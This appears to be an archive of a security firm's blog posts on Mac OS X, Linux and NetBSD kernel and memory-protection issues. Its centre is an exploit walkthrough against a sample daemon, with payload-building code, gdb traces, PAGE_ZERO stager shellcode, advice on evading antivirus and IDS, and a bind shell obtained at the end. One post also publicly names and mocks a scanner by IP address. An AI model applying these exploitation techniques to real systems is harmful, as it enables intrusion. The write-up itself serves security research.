Several software vendors realized, sometime during the 1990-2000 timeframe,
that exporting system call tables within kernel address space was a bad idea.
This obviously doesn't mean anything to Red Hat and other GNU/Linux vendors
who are happily providing world readable System.map files. Not
like anybody needs them, though.
Then again, you have to face potential funniness of contradictory measures,
like Apple's own mistakes. This article won't talk about yet another bug
introduced by a Linux developer working at Red Hat (and later silently fixed
by another employee of the very same company), but an interesting issue with
Mac OS X 10.4 systems on PowerPC.
Albeit the implementation of ptrace on Mac OS X is severely crippled,
they had time to add a nifty trick to prevent immediate debugging of certain
processes. Undocumented, it was obviously used only by Apple's own software, namely
iTunes and related applications. A private flag set by a process would disallow
future interaction with it via ptrace or other mechanisms, thus
causing the gdb debugger to fail when trying to attach to the target
process. A modern version of the good old trick first described publicly by Silvio
Cesare in one of his anti-debugging
articles.
Apple, possibly with the intention of helping anti-piracy software vendors (in
their quest to preserve all that is good and just in the software industry and
beyond) added a KPI
(Kernel Programming Interface) that let's a kernel extension patch the
ptrace system call. The sysent variable (the
BSD equivalent of the Linux syscall_table, holding pointers, arguments
and other data of the supported system calls) is not exported
in any Mac OS X system, as a measure to prevent abuse (for example, in rootkits
and other malware subverting kernel-land code).
Therefore, there's no absolutely reliable method to patch the system call table
without resorting to hacks (even though these can be extremely reliable, mostly
always they are tied to specific versions and or architectures). Hence, the existence
of temp_patch_ptrace. See the implementation of the function below:
481 /*
482 * WARNING - this is a temporary workaround for binary compatibility issues
483 * with anti-piracy software that relies on patching ptrace (3928003).
484 * This KPI will be removed in the system release after Tiger.
485 */
486 uintptr_t temp_patch_ptrace(uintptr_t new_ptrace)
487 {
488 struct sysent * callp;
489 sy_call_t * old_ptrace;
490
491 if (new_ptrace == 0)
492 return(0);
493
494 enter_funnel_section(kernel_flock);
495 callp = &sysent[26];
496 old_ptrace = callp->sy_call;
497
498 /* only allow one patcher of ptrace */
499 if (old_ptrace == (sy_call_t *) ptrace) {
500 callp->sy_call = (sy_call_t *) new_ptrace;
501 }
502 else {
503 old_ptrace = NULL;
504 }
505 exit_funnel_section( );
506
507 return((uintptr_t)old_ptrace);
508 }
It's not available on Leopard. The implications of this are fairly evident:
ptrace system call
without knowing the sysent exact location.ptrace takes a good amount of arguments, therefore providing a wide
range of possibilities (as an exercise, think of a protocol based on ptrace
which, upon a magic request argument, performs specific actions using a
data buffer pointed by the addr argument).ptrace on kernel address
space. If we wanted to locate sysent within a specific range of addresses,
knowing the location of a system call will let us calculate an offset to the start of
the structure (allowing verification for known values too).
So, why would Apple stop exporting the sysent structure and still
provide a function with the purpose of patching a system call? Why not exporting
sysent if a linear memory search is trivial to use for locating it
on memory (which has been used historically by Linux rootkits)?
Once again, the Linux kernel developers delight us with their always discreet (read: silent, no-advisory, no-warning policy) and wonderful patching practices. Sometime between 2.6.24 and 2.6.25 a patch from a Red Hat developer was committed into the Linux kernel git tree, implementing changes to the VMI interfaces hooking some functions dealing with the GDT and LDT.
diff --git a/arch/x86/kernel/vmi_32.c b/arch/x86/kernel/vmi_32.c
index 6ca515d..edfb09f 100644
--- a/arch/x86/kernel/vmi_32.c
+++ b/arch/x86/kernel/vmi_32.c
@@ -235,7 +235,7 @@ static void vmi_write_ldt_entry(struct desc_struct *dt, int entry,
const void *desc)
{
u32 *ldt_entry = (u32 *)desc;
- vmi_ops.write_idt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
+ vmi_ops.write_ldt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
}
static void vmi_load_sp0(struct tss_struct *tss,
It's not truly clear if there's a reliable way to abuse this issue properly (since
data passed to sys_modify_ldt goes through several checks and might not
trigger the vulnerable code path right away). Although, the original commit mentions
that it was discovered when JRE caused failures. In addition, vmi_ops.write_idt_entry
might do further validation, thus reducing the issue to a mere denial of service in
the worst case. Also, it affects only x86 VMI guests.
After some time without any updates coming up, this article will show some techniques and strategies to improve reliability of exploit code in Mac OS X Tiger and Leopard (up to 10.5.5). Specifically, we will look at a technique to aid loading of stager shellcode and evading non-executable stack restrictions. This was hinted at the "OS X Exploits and Defense" book (Elsevier), chapter 7, which I wrote earlier this year (co-authored the book with Kevin Finisterre).
Ideally, when shellcode size restrictions exist, and possibly in almost any situation where subtle and discreet operation is required, you should never use a standard or publicly available shellcode, like the usual so-called "bind shell" or "reverse shell". Not only they are identified by IDS vendors but they will also fail when certain constraints are present. In addition, a combination of stubs (splitting functionality in small dock-able shellcodes) with an encoder will defeat most packet inspectors and signature-based detection products (for example, antivirus engines).
When using a stager, you might find few different shortcomings that prevent your code from being reliable or effective against the most wide span of architectures and platforms:
malloc() or other allocators requires previous knowledge
of their location within the address space.mlock is required.
vulnerabled is a (TCP based) network daemon which processes
incoming messages and seeks a callto:// handler. Then it reads
whatever is trailing after the handler string. Imagine this daemon is used
to connect to a VoIP solution that calls numbers provided by a crawler to
do phone spam or targeted advertisement.
The daemon properly reads the incoming message into a heap allocated buffer,
named tmpbuf. Its contents are zeroed every time the loop runs, therefore
making reliable usage of the buffer impossible on two consecutive runs if
tmpbuf points to the same address. A memory leak would help in
this situation, but there's none.
Afterwards, data is read from the incoming connection, into tmpbuf.
It NULL-terminates the buffer, but if tmpbuf address is overwritten,
a NULL byte will be written off-bounds. Such a situation could be useful in certain
cases, but we won't be looking into this particular possibility in depth for this
article; a single NULL byte write can indeed lead to arbitrary code execution, as
long as some requirements are met: here the offset will be equal to the length of
the data received from the client, thus we will need to send a payload of specific
length to match the offset (example: target address minus address of
tmpbuf) where we want our NULL to be injected.
22 char *tmpbuf = NULL;
23 char vulnbuf[265];
...
37 tmpbuf = malloc(8092);
...
74 while(1) {
...
91 memset(vulnbuf, 0, sizeof(vulnbuf));
...
96 if ((recvlen = recv(connfd, tmpbuf, 8092, 0)) != -1)
97 {
98 tmpbuf[recvlen] = '\0';
If the incoming data contains the handler string, it reads the trailing string
into the stack-based buffer named vulnbuf, which has a fixed size
of 265 bytes. A stack-based buffer overflow condition with a twist: we can abuse
variable ordering to do a more sophisticate attack against vulnerabled.
Instead of a single packet payload, we will dedicate one to send the main
payload and a second one to trigger it and subvert the execution flow in an elegant
manner. This will allow us to introduce the main topic of this article: creating
custom shellcode for evading security measures and improved reliability of stagers.
100 if ((recvlen > handlerlen) &&
101 (!memcmp(tmpbuf, DEFAULT_HANDLER, handlerlen)))
102 {
106 memcpy(vulnbuf, tmpbuf+handlerlen, recvlen-handlerlen);
107 fprintf(stdout, "received message: %s\n", vulnbuf);
108 }
109
110 if (recvlen > 4 && (tmpbuf[0] == '.') &&
111 (tmpbuf[1] == 'e') && (tmpbuf[2] == 'n') &&
112 (tmpbuf[3] == 'd'))
113 break;
In the previous section we walked through the code of the sample vulnerable
daemon, reviewing the potentially exploitable security issues. Finally, we
suggested an elegant approach to abuse the issues for reliable code execution
against Apple Mac OS X Leopard 10.5.5. This section will explain said approach
thoroughly.
The layout of the attack is as follows:
callto://)mprotect() and pre-stager shellcodecallto://).end)
data += self.shellcode
data += self.random_string(265-len(self.shellcode))
data += self.random_string(4)
data += self.random_string(4)
data += struct.pack('<L', ebp_address)
heap_jumper = ''
heap_jumper += '.end'
heap_jumper += struct.pack('<L', 0x80000c)
You might have noticed that writing to EBP for overwriting saved EIP
requires us to write 4 bytes preceding the new EIP value. The length
of the end control message is... exactly 4 bytes. And that's the condition
that let's us abuse the variable ordering to point tmpbuf at
EBP directly and overwrite saved EIP correctly. The final payload is
copied by recv into EBP:
(gdb) p $ebp $32 = (void *) 0xbffff888 (gdb) p tmpbuf $33 = 0xbffff888 ".end\f" (gdb) x/2x tmpbuf 0xbffff888: 0x646e652e 0x0080000c (gdb) x/i 0x0080000c 0x80000c: nop (gdb) p recvlen $34 = 8
Note the address pointing to the heap buffer which was allocated initially.
Mac OS X has an absolutely predictable heap, fortunately for us, unfortunate
for the end-user security. We have effectively overwritten a pointer address
to force the next recv call to write arbitrary data on EBP.
(gdb) c Continuing. vulnerabled(1654) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed *** set a breakpoint in malloc_error_break to debug Program received signal SIGTRAP, Trace/breakpoint trap. 0x0080002b in ?? () (gdb) x/4i $eip 0x80002b: xor %eax,%eax 0x80002d: push %eax 0x80002e: push %eax 0x80002f: push $0x1012 (gdb) i f Stack level 0, frame at 0xbffff888: eip = 0x80002b; saved eip 0xbf800000 called by frame at 0x800032 Arglist at 0xbffff880, args: Locals at 0xbffff880, Previous frame's sp is 0xbffff888 Saved registers: ebp at 0xbffff880, eip at 0xbffff884
There's a catch: if the binary has been compiled with IBM Stack Smashing Protector (SSP, in the past, known as ProPolice) the arrangement of variables on memory will be different and we won't be able to reach the pointer from the stack-based buffer, thus rendering this approach impossible.
The custom shellcode explained here will use only a single
function from libSystem (the libc of sorts on OS X): mprotect.
It should be feasible to change memory protections using a different
method, but this is suitable for a re-spawning daemon since we can
bruteforce the dyld stub address.
It uses the mmap and mlock system calls, to
map memory at PAGE_ZERO (NULL, 0x00000000) and
lock pages to physical memory, respectively.
This is the first time that this technique appears (specifically for OS X)
publicly. The MACH-O binary format defines a zeroed, unmapped memory segment
at position 0, named PAGE_ZERO. It remains unmapped under normal circumstances
to force exceptions on NULL dereference conditions (read/write to NULL, offset
from NULL when reading a member of a structure pointing at NULL, etc).
If we map PAGE_ZERO and set its permissions to read-write-execute, we will have
space of PAGE_SIZE length (4096 bytes on x86) for storing shellcode stages
and pretty much anything we could find useful. Side-effects of mapping PAGE_ZERO
will be difficult to predict. Any future mistakes and programming errors
that dereference NULL or a offset from NULL won't raise an exception. Also,
if data is written there, our shellcode or data will be corrupted. Therefore,
for safety purposes, we might want to leave an initial set of bytes at NULL
unused (unchanged, thus zeroed). If data changes in the initial bytes, we
could raise an exception to emulate normal behavior, in case it's
been done as part of a test to detect our presence.
Mapping PAGE_ZERO will be clearly visible and it's not subtle if it remains in
mapped state for a long time. Apparently the dyld loader and other operations
during MACH-O execution time map the segment for a very short time.
The mprotect produces the following results when executed within
the context of vulnerabled after successful exploitation, before execution
of the stager shellcode:
Stack bf800000-bffff000 [ 8188K] rwx/rwx SM=PRV Stack bffff000-c0000000 [ 4K] rwx/rwx SM=COW thread 0 Stack [ 8192K]
And the mmap of PAGE_ZERO produces the following results (note the
initial unmapped state, and the different permissions afterwards, before the
final mprotect call):
Before mmap(): __PAGEZERO 00000000-00001000 [ 4K] ---/--- SM=NUL .../vulnerabled __PAGEZERO [ 4K] Before mprotect(): __PAGEZERO 00000000-00001000 [ 4K] rw-/rwx SM=NUL .../vulnerabled After mprotect(): __PAGEZERO 00000000-00001000 [ 4K] rwx/rwx SM=NUL .../vulnerabled
Now our stager shellcode will be able to write data received from the attacking host to a writable and executable region at a static address, without requiring allocation using non-static locations.
Developing custom shellcode is trivial in most situations, albeit testing can
be tiresome. Mac OS X lack of heap and mmap randomization is embarrassing,
and its layout has been repeatedly demonstrated to be easily predictable. Also, heap
memory permissions aren't enforced against execution (and read implies execute on Intel),
thus making heap a safe bet for storing our shellcode, and other data on runtime during
exploitation. ASLR in Leopard is incredibly weak, allowing trivial abuse of daemons
and applications re-spawning after an exception, and certain dyld ABI is still static.
Last but not least, lack of general memory permissions enforcement allows regions
to be made executable, thus defeating the whole purpose of both ASLR and NX on OS X.
$ python vulnerabled_exploit.py -s 127.0.0.1 -p 6888 [+] Target vulnerabled at 127.0.0.1:6888 ... [+] Running... [+] Finished (shellcode was 152 bytes, 290 total). [+] Check 127.0.0.1:6900 for shell. (gdb) r Starting program: ./vulnerabled Reading symbols for shared libraries ++. done Starting ./vulnerabled (pid: 2141, port: 6888)... connection from 127.0.0.1 tmpbuf=0x800000 vulnbuf=0xbffff74b esp=0xbffff6f0 it's a good message! (282 bytes, 273 in data) received message: ??????????1??R??? connection from 127.0.0.1 tmpbuf=0xbffff888 vulnbuf=0xbffff74b esp=0xbffff6f0 vulnerabled(2141) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed *** set a breakpoint in malloc_error_break to debug Program received signal SIGTRAP, Trace/breakpoint trap. 0x8fe01010 in __dyld__dyld_start () (gdb) c Continuing. Reading symbols for shared libraries .. done $ nc 127.0.0.1 6900 id uid=501(myuser) gid=20(staff) groups=20(staff),98(_lpadmin), ...
Apparently someone, in his glaring innocence, is playing around Apache. Possibly we should start looking at mod_python or maybe mod_ssl. Maybe we can just let RBAC and PaX take care of it. But abuse departments are extremely responsive these days! One wonders what these people think when they have their DSL lines shut down.
Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28215] Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28215] Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28934] Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28934] Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28922]
The grand official Idiot of the Month, for your amusement. You might find it useful to add his IP range to your preferred spam blacklist as well. And another prop to spender for the brute force prevention feature of grsecurity, which makes exploiting re-spawning daemon vulnerabilities a hell more boring and futile. Especially when you have 40 bits of ASLR on your side. Yikes!
OrgName: Road Runner HoldCo LLC OrgID: RRMA Address: 13241 Woodland Park Road City: Herndon StateProv: VA PostalCode: 20171 Country: US ReferralServer: rwhois://ipmt.rr.com:4321 NetRange: 65.184.0.0 - 65.191.255.255 CIDR: 65.184.0.0/13 NetName: RR NetHandle: NET-65-184-0-0-1 Parent: NET-65-0-0-0-0 NetType: Direct Allocation NameServer: DNS1.RR.COM NameServer: DNS2.RR.COM NameServer: DNS3.RR.COM NameServer: DNS4.RR.COM Comment: RegDate: 2004-04-07 Updated: 2005-05-16 OrgAbuseHandle: ABUSE10-ARIN OrgAbuseName: Abuse OrgAbusePhone: +1-703-345-3416 OrgAbuseEmail: abuse@rr.com OrgTechHandle: IPTEC-ARIN OrgTechName: IP Tech OrgTechPhone: +1-703-345-3416 OrgTechEmail: abuse@rr.com
The .NET framework provides a Marshal class from its Runtime.InteropServices namespace which helps interfacing native and unmanaged data with managed code. The easy path for most of these cases is to simply use unsafe blocks and cast a pointer, but you end up losing references to allocated structures, leaking memory and likely leaving some funny exploitable condition in your unmanaged code bridge. Those pesky dangling pointers...
The function below calls an internal method to retrieve the list of loaded
kernel modules from userland. It depends on NtQuerySystemInformation()
and requires a heap-allocated structure array. Interfacing this with a C# managed
class will require another exported function to call HeapFree() and
release the allocated memory.
Using such an approach is certainly not recommended but it will cut you some hassle:
extern "C" __declspec(dllexport) PSYSTEM_MODULE_INFORMATION GetKernelModules(void)
{
HANDLE tmpHeap = GetProcessHeap();
PSYSTEM_MODULE_INFORMATION modList = NULL;
LoadFunctionPointers();
_getSysModules(&modList, tmpHeap);
return modList;
}
extern "C" __declspec(dllexport) void MyFreeHeap(LPVOID ptrToFree)
{
HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, ptrToFree);
}
On the C# side, we will be using a Marshal structure declaration in order to be
able to use the PtrToStructure method, which allows us to copy memory from
unmanaged space into our managed class, and then we can release whatever memory
was allocated for the native API.
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 2)]
public struct SYSTEM_MODULE_INFORMATION
{
[MarshalAs(UnmanagedType.U4)] public UInt32 Reserved1;
[MarshalAs(UnmanagedType.U4)] public UInt32 Reserved2;
...
}
int curOffset = (int)(i * Marshal.SizeOf(Modules[i]));
IntPtr curPtr = new IntPtr(ModulesListPtr.ToInt32() + curOffset);
Modules[i] = (SYSTEM_MODULE_INFORMATION) Marshal.PtrToStructure(curPtr,
typeof(SYSTEM_MODULE_INFORMATION));
[DllImport("mylib.dll", CharSet = CharSet.Unicode)]
private extern static void MyFreeHeap(IntPtr ptr);
Depending on your target platform, you might want to adjust CharSet
since Unicode is the default on NT based systems (that is, all modern versions of
Windows, excluding 9x/ME if you consider them modern... although in terms of
security, it seems like Windows 98 is safer, after all, most malware doesn't work
on it anymore). Packing is also important, since it means how your structure is
actually stored on memory. Values of 1-2 are safe, just verify the alignment of
the variables within the structure you are trying to use.
Some suggestions:
pInvoke or
similar method that itself works with HeapFree within your DLL bridge library.
You could also use Marshal.AllocHCGlobalGCHandle when you need to write data from your unmanaged
code directly, and remember to release it once you are done with it. But
never overwrite the address of managed object or you will
end up hitting an invalid free whenever the GC attempts to release your now
corrupted object. And that might happen in a manner that makes debugging a
pain in the ass. Better go clubbing than waste your time debugging that.One may think that vulnerabilities can't get any more stupid, but there's always an Apple advisory to beat the record. A setuid Emacs binary? Seems like a plan. (From APPLE-SA-2008-07-31 and CVE-2008-2324).
Disk Utility CVE-ID: CVE-2008-2324 Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11 Impact: A local user may obtain system privileges Description: The "Repair Permissions" tool in Disk Utility makes /usr/bin/emacs setuid. After the Repair Permissions tool has been run, a local user may use emacs to run commands with system privileges. This update addresses the issue by correcting the permissions applied to emacs in the Repair Permissions tool. This issue does not affect systems running Mac OS X v10.5 and later. Credit to Anton Rang and Brian Timares for reporting this issue.
The "Repair Permissions" tool should have been removed from Mac OS X a long time ago.
Running our custom pyblosxom engine with mod_wsgi and Apache disk-based cache enabled is currently providing a performance of roughly 170 requests per second as of a measurement running 50 concurrent requests and a total of 1000 requests against the index page as of 6th September 2008.
There are some potential improvements and lighttpd or a similar high performance webserver could probably beat these numbers by a magnitude of a few thousand requests. We will be likely testing such a setup in the future. In our tests, lighttpd itself can handle around 1012.06 requests per second for a FastCGI served lightweight PHP script with no database backend usage.
Server Software: Apache
Server Hostname: blog.subreption.com
Server Port: 80
Document Path: /hub
Document Length: 24112 bytes
Concurrency Level: 50
Time taken for tests: 5.882 seconds
Complete requests: 1000
Failed requests: 0
Write errors: 0
Total transferred: 24289000 bytes
HTML transferred: 24112000 bytes
Requests per second: 170.02 [#/sec] (mean)
Time per request: 294.088 [ms] (mean)
Time per request: 5.882 [ms] (mean, across all concurrent requests)
Transfer rate: 4032.75 [Kbytes/sec] received
Connection Times (ms)
min mean[+/-sd] median max
Connect: 0 0 0.2 0 1
Processing: 17 287 51.1 299 490
Waiting: 16 286 51.2 298 490
Total: 18 287 51.0 299 491
Percentage of the requests served within a certain time (ms)
50% 299
66% 313
75% 321
80% 325
90% 338
95% 351
98% 368
99% 375
100% 491 (longest request)
Finally the blog is back, after many changes in the infrastructure behind the scenes. The most important move was removing PHP support in our servers and migrating from Wordpress as blogging engine. Unfortunately, the current state of security for web applications developed with PHP and the language itself, is simply not acceptable for most people with above average security requirements.
preg_replace()
calls.mod_php itself is a memory blackhole. Only FastCGI
environments can provide a minimally acceptable level of security when it
comes down to privilege separation and memory address space isolation.
As an example, check how mod_php let's a PHP script access
Apache's file descriptors. It's just stupid.We are now running on a full Python and Ruby infrastructure with isolated jails and few critical services virtualized. PaX and grsecurity RBAC policies provide the necessary fncitonality to ensure that every process is locked down properly. Besides, PaX on 64-bit processors provides a whopping 40-bit ASLR entropy :).
Finally a free alternative to the insanely expensive BinDiff by Zynamics (also known as Sabre Security in the past). It's been developed by Tenable Security (the people behind Nessus nowadays), and requires IDA Pro 5.2 on Windows.
Get PatchDiff 2 and give it a try, it's looking good so far. That said, it's graphing capabilities aren't as nice as BinDiff's, and it may lack of some features, albeit possibly compensated by the 1330 USD of a license to 0 USD of Tenable Security's free alternative.
Alright, this might be the first article on the "Silent Patches" series, starting today and possibly lasting... forever. So, let's get to the business. Brad "spender" Spengler is pissed, and that's already a bad thing for the many people that knowingly or not, take advantage of his work and that from the guy or guys behind PaX, to be referred as The PaX Team, or Those Smart Guys Teaching Security On LKML.
spender and the PaX Team have possibly contributed the most important advances in proactive defense technology for the past decade. ASLR was there before it became a marketing buzzword, NX and memory protections enforcement existed way before Red Hat pushed ExecShield to the Linux kernel and TCP & UDP source port randomization have been known for a while (even though now they seem to be the world's new internet superheroes with all this DNS the-end-is-nigh media frenzy).
If you have used grsecurity in the past few years, you've used what Microsoft, Apple and Red Hat pretended to market as brand new technology baked in their very own development cubicles.
The story now is how the Linux kernel developers managed to absolutely and irremediably piss off the very same people that fed them with security research and technology that really worked as expected. The very same people that have patched upstream vulnerabilities in their "third-party patches".
Back in 2005 (see [1]) this was already happening. The fact that now we have a handy git interface where we can retrieve commit logs without difficulty just helps to pinpoint the silently patched issues and identify potentially hot issues.
Our take on this fracas is that spender and the PaX Team are rock-solid consistent with their arguments, and that the Linux kernel development people should definitely change their alleged full-disclosure policy text with one more accurate according to their true practices.
When CVE-2007-0015 was published by the Month of Apple Bugs team, their exploit used a QTL Quicktime playlist file for triggering the bug. Whether their decision was because of preventing the exploit from being used "en masse" or simply for testing a different, less classic attack vector, it's still worth noting that it could have worked far more efficiently via Safari, since Quicktime supports embedding playlist files and the Safari process address space would be easily subverted to ensure a higher degree of reliability when executing our payload.
Sometimes it's good to remember old flaws, and improve old exploit code. Sometimes it's even better to use new attack vectors on old flaws, too.
This is nothing new, and it's strictly what the POSIX
specification warns about mlock() & munlock().
As you may already know, mlock() locks memory to prevent it from
being swapped to disk (for example, if you require cryptographic secrets such as
encryption keys to be memory resident during system stress, preventing
resilience on disk and other media). munlock() does exactly the
opposite: it unlocks memory.
The problem is that both functions don't necessarily work in the same manner across different implementations. The address parameter to both might be required to be page-aligned (rounded up to the size of a memory page, for example 4096 bytes in x86).
What happens if we supply a non-page aligned memory address? If the
implementation rounds up by default, we will be either locking a whole page or
unlocking it, if we use mlock() or munlock()
respectively. That means all the memory contents within the same page will be
affected. This might not be an issue during locking, but when you are unlocking,
it's a different situation... we might expose data that was supposed to remain
locked and compromise other secrets.
The only solution to this issue is to have a consensus between vendors and implement the same behavior. That, or design and develop your own secure memory pool :) !
To illustrate this post, you can see below the implementation for Mac OS X Leopard (10.5):
972 int
973 mlock(__unused proc_t p, struct mlock_args *uap, __unused register_t *retvalval)
974 {
975 vm_map_t user_map;
976 vm_map_offset_t addr;
977 vm_map_size_t size, pageoff;
978 kern_return_t result;
979
--
982
983 addr = (vm_map_offset_t) uap->addr;
984 size = (vm_map_size_t)uap->len;
985
986 /* disable wrap around */
987 if (addr + size < addr)
988 return (EINVAL);
989
990 if (size == 0)
991 return (0);
992
993 pageoff = (addr & PAGE_MASK);
994 addr -= pageoff;
995 size = vm_map_round_page(size+pageoff);
996 user_map = current_map();

We haven't been abducted, yet. While working on an interesting research project, we found something about Apple's Kernel Authorization framework that might be a bit odd. From their documentation:
When writing a vnode scope listener, be aware that not every file
system operation will trigger an authorization request. For example, if an actor
successfully requests KAUTH_VNODE_SEARCH on a directory, the system
may cache that result and grant future requests without
invoking your listener for each one.
Albeit we haven't verified this any further, it's at very least interesting. Does that mean that a security decision might be cached and applied again under potentially circumstances? Huh. It's true that a vnode scope listener can be one hell of a performance black-hole, but race conditions due to cached decisions is worse than slowing down file system operations, especially if the module overrides other policies.
We've been talking to a kernel developer of the NetBSD project (probably the most portable
operating system out there), regarding its security status and some potential
enhancements.
While reading through the secmodel
securelevel source, we spotted this interesting snippet:
case KAUTH_REQ_SYSTEM_TIME_SYSTEM: {
struct timespec *ts = arg1;
struct timeval *delta = arg2;
/*
* Don't allow the time to be set forward so far it will wrap
* and become negative, thus allowing an attacker to bypass
* the next check below. The cutoff is 1 year before rollover
* occurs, so even if the attacker uses adjtime(2) to move
* the time past the cutoff, it will take a very long time
* to get to the wrap point.
*
* XXX: we check against INT_MAX since on 64-bit
* platforms, sizeof(int) != sizeof(long) and
* time_t is 32 bits even when atv.tv_sec is 64 bits.
*/
if (securelevel > 1 &&
((ts->tv_sec > INT_MAX - 365*24*60*60) ||
(delta->tv_sec < 0 || delta->tv_usec < 0)))
result = KAUTH_RESULT_DENY;
break;
}
Even if time for keeping this blog updated is becoming rather scarce, we couldn't resist publishing a note about Quicktime again. It was on the news some time ago, due to another simple, classical stack buffer overflow flaw. It was related with RTSP interfaces again.
Our exploit pack already provides a reliable exploit against this and other recent flaws, and there's no real exploit for this flaw publicly available (in terms of quality and reliability). It's quite possible that so-called drive-by malware installation kits are making use of this flaw to infect unsuspecting users.
We expected Apple to perform some due diligence with Quicktime's QA, since the last real 1990 style flaws have been all related to RTSP functionality, but looks like they are still missing some guidance. Hopefully it won't take long for them to realize that something like SDL could significantly improve their product security.
Subreption blog by Subreption LLC is Licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0
United States License.